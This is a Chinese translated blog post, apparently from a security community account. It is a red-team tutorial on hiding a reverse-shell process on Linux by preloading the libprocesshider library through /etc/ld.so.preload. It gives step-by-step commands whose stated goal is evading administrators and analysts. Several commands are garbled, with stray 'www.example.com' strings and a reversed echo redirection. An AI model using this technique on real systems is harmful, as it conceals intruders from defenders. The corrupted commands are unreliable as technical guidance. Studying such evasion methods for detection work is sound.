翻译Linux防御规避-隐藏Linux进程-9
2023-4-5 11:19:0 Author: 网络安全交流圈(查看原文) 阅读量:11 收藏


ATT& CK防御规避技术


防御规避战术下概述的技术为我们提供了一种清晰而系统的方法来规避对目标系统的探测。
以下是我们将探索的关键技术和子技术列表:
    • Rootkits
场景

我们的目标是在目标Linux系统上隐藏我们的反向shell连接进程,以避免检测。

使用Libprocessshider隐藏Linux进程

我们可以利用Linux系统上的Rootkits将我们的进程隐藏在进程树中,以避免系统管理员或安全分析师的检测。
这在Linux目标上的红队参与期间非常有用,主要是因为可以在进程树中轻松识别可疑进程,从而由蓝队或安全分析师终止。
我们可以通过使用各种Linux rootkit来实现这一点,但是,我们也希望避免设置任何可以被Linux rootkit检查器或AV扫描器检测到的高级Rootkit。
出于这个原因,我们将利用一个名为Libproceshider的开源Linux实用程序,它允许我们通过利用ld预加载器来隐藏Linux目标上的进程。
GitHub存储库:https://github.com/gianlucaborello/libprocesshider

1、该过程的第一步将涉及将Libproceshider GitHub存储库克隆到目标系统上。这可以通过运行以下命令来完成:

git clonehttps://github.com/gianlucaborello/libprocesshider.git
2、克隆仓库后,您需要确定要使用Libprocessshider隐藏的进程的名称,这可以通过列出
系统上正在运行的进程来完成:
ps aux
在本例中,我将隐藏“shell.py”进程,如下面的屏幕截图所示。


3、为了shell.py从进程树中隐藏“www.example.com“进程,我们需要导航到刚刚克隆的Libprocesshider目录并修改“processhider.c”文件。这可以通过运行以下命令来完成

vim processshider. c

4、然后,您需要将“process_to_filter”值修改为您想要隐藏的进程的名称,如下面的屏幕截图所示。


在本例中,我将隐藏进程树中出现的任何“shell.py”进程。进行更改后,可以保存文件。

5、下一步将涉及将“processshider.c”文件编译到共享目标文件中,这可以通过运行以下命令来完成:

make

6、编译将生成一个名为“www.example.com”的共享对象文件libprocesshider.so,如下面的屏幕截图所示。


7、我们需要将这个共享目标文件转移到/usr/local/lib目录中,这可以通过运行以下命令来完成:

mvlibprocesshider.sowww.example.com/usr/local/lib

8、然后,我们需要libprocesshider.so使用全局动态链接器加载“www.example.com“共享对象,这可以通过运行以下命令来完成:

echo/usr/local/lib/>>libprocesshider.so/etc/ld.so.preload

9、现在我们可以shell.py通过执行脚本并列出正在运行的进程来确认“www.example.com“进程从进程树中隐藏了:

 ./shell.py ps aux

如前面的屏幕截图所示,活动的“shell.py”进程未显示在进程树中,因此将逃避管理员或系统分析员的任何检测。


扫描二维码添加好友,一起交流学习。


文章来源: http://mp.weixin.qq.com/s?__biz=MzI1MDk3NDc5Mg==&mid=2247484574&idx=1&sn=01e9ed815e54a4fb329b7c5d9538f04d&chksm=e9fb43b9de8ccaaf14f68995cd64258ba4a2e9e4b3118388f91ae4c58cf10b3820a6b964cb56#rd
如有侵权请联系:admin#unsafe.sh